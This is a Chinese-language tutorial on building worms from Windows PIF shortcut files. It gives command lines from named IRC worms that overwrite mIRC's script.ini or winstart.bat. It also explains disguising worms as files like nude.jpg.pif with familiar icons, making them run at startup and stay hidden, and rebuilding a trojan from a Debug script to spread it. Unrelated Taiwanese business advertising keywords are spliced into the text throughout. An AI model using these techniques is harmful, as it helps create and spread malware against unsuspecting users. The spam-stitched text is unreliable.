Pif 可以用來指向一個dos程序,也就是dos程序的快捷方式,比如可以連到一個病毒或者木馬.

　　它自己也可能就是一個蠕蟲,讓我們深入的研究一下...(台南牛排)

　　[你要會點 DOS 下的 batch 語言(批處理文件) 和 知道怎樣使用 Debug]

　　這裏有下面提到的幾個pif病毒文件,點擊這裏下載.在這察看源代碼!（台北除白蟻）

　　PIF 蠕蟲 :

　　Pif不可以在Win9x下編輯;要生成一個Pif文件,只要右擊鼠標,指向"新建"->"快捷方式"

　　.(戶外傢俱)

　　會跳出一個窗口,我們在命令行輸入 C:\command.com .然後為我們的蠕蟲起一個"wormtest" 的名字,然後回車,OK!

　　(你也可以使用一個存在的pif文件)（手工眼鏡）

　　右擊 pif 文件,選擇"屬性"接著點擊程序.這就是控制 pif 文件的主要場所了.在我們接著學之前,讓我們看看我的Pif 蠕蟲中的幾個命令...

　　例子:

　　IRC-WORM Elsa:（玻璃貼紙）

　　C:\COMMAND.COM /C copy C:\mirc\download\cuteELSA.JPG.pif C:\mirc\script.ini /Y

　　C:\MIRC

　　IRC-WORM Elsa.b:（窗貼）

　　C:\COMMAND.COM /C copy C:\mirc\download\EmmaPeel.HTML.pif C:\mirc\script.ini

　　/

　　C:\MIRC

　　IRC-Worm.Movie.c:（減重）

　　%comspec% /c copy c:\mirc\download\X_PASS.TXT.pif %windir%\winstart.bat

　　C:\

　　IBLIS_FinalVersion:

　　-------------------

　　%comspec% /c copy IBLIS_~1.pif ..\script.ini /Y

　　留個空白（鄉村風）

　　現在,我想你已經大概明白是怎么回事了..

　　讓我們回到我們的 wormtest.pif 文件...

　　先為你的蠕蟲起一個好聽的名字.比如: nude.jpg.pif .你只要把你的pif文件改名為nude.jpg (日式禪風室內設計).

　　而且pif文件的後綴名一直是可視的,酷啊!(來個sex.jpg , sexwww.txt .來整整那些色狼)

　　讓我們到pif文件屬性中的程序中來...（接睫毛）

　　a- 命令行 :

　　-----------------

　　Pif最好的功能之一就是命令行.雖然命令的長度受到了限制,但是我們仍然能做些有趣的事......

　　但是重要的一條是,蠕蟲文件已經存在於電腦的某個地方了,mIRC 和 Windows的目錄都是我們的主要攻擊對象...（相片印表機）

　　你只能用command.com這個文件來完成我們的作品,你只要看看上面的四條命令,就會理解了,當然最後一個也是最好的一個,因為即使不是 C:\mirc\ 目錄,它也能把腳本拷過去,而且它也是最小的一個 :) .如果你要把 pif 文件拷成mIRC的腳本文件,那么你就要編輯它,加入一些腳本命令;（婚禮大頭貼）如果你把pif拷貝到winstart.bat,那么就需要一些dos命令...

　　只要仔細看看上面下載的4個pif文件,你就會明白是什么原理了...

　　b- 工作目錄 :

　　-----------------

　　最好的方法就是留下空白 ... ;)（戶外桌椅）

　　c- 運行 :

　　-----------------

　　在這,你必須要選擇一項,蠕蟲運行的時候,就會跳出一個窗口,不用擔心 :)

　　d- 改變圖標 :

　　-----------------

　　這是一個非常好的功能,（戶外吊籃）我建議你選擇一個大家熟悉的windows下程序的圖標,比如畫圖,記事本...

　　通過這些屬性,我們就可以把一個沒用的快捷方式改造成一個非常好的蠕蟲程序 :)

　　最後的工作就是編輯 pif 文件,加入一些腳本或者 dos 命令.（戶外陽傘）打開和編輯pif文件,要通過dos下的 edit 來完成.你可以在蠕蟲中加入一些命令,當把script.ini文件拷到 mIRC 的目錄下的時候.mIRC.exe 就會加載它,並且運行指令.

　　bat文件的原理也是一樣的.

　　注意要點:（新竹真空成型）

　　-------------

　　* 在windows啟動時自動運行.

　　* 保存一個備份文件(不是蠕蟲的主程序,否則可以輕易的刪除掉).

　　* 要隱藏的很好,不能被發現（PET包裝盒）

　　* 目標是 Mirc & Pirch

　　傳播 病毒 或 木馬 :

　　那么你是怎樣通過pif文件來遠程安裝木馬和傳播病毒的呢?

　　其實這很簡單,你只要做一個像下面這樣的 pif 命令行 :（抗靜電盤）

　　%comspec% /c copy sexbmp~1.pif %windir%\winstart.bat

　　C:\

　　把 pif 的文件名改成 sex.bmp, （戶外傢俱）編輯它.把你的病毒或者木馬轉換成 Debug 腳本.

　　Pif 文件將會把自己拷貝成 winstart.bat 在 %windir% 的目錄中,下面就簡單了...

　　你還要加入一些 debug 腳本到 winstart.bat 中,（桃園美髮）和其它的一些功能.(如讓 windows 啟

　　動時自動運行).

　　注意要點:

　　------------

　　- 首先,把你的病毒或者木馬轉換成 debug 腳本（台中制服）

　　- 把 debug 放到 winstart.bat 文件中

　　- .bat文件中包含了 debug 腳本

　　- 接著,他就會運行 Debug 通過 debug 腳本來生成 exe 文件（台中團體服）

　　- 最後,運行 exe 文件,或者修改注冊表來運行它.

　　總結:千面殺手殺手的木馬應該是保存在pif文件中的,它應該是由作者自己寫的,應為debug腳本是越小越好.所以普通殺毒軟件應該能夠應付.（台中檢驗所）至於傳播可能使用了泡沫男孩和美麗沙的傳染方式,通過e-mail傳播,也可能使用了最新的微軟的Outlook 的漏洞. 總之,大家不要聞毒喪膽.病毒只是一個優秀的小程序.（台中健康檢查）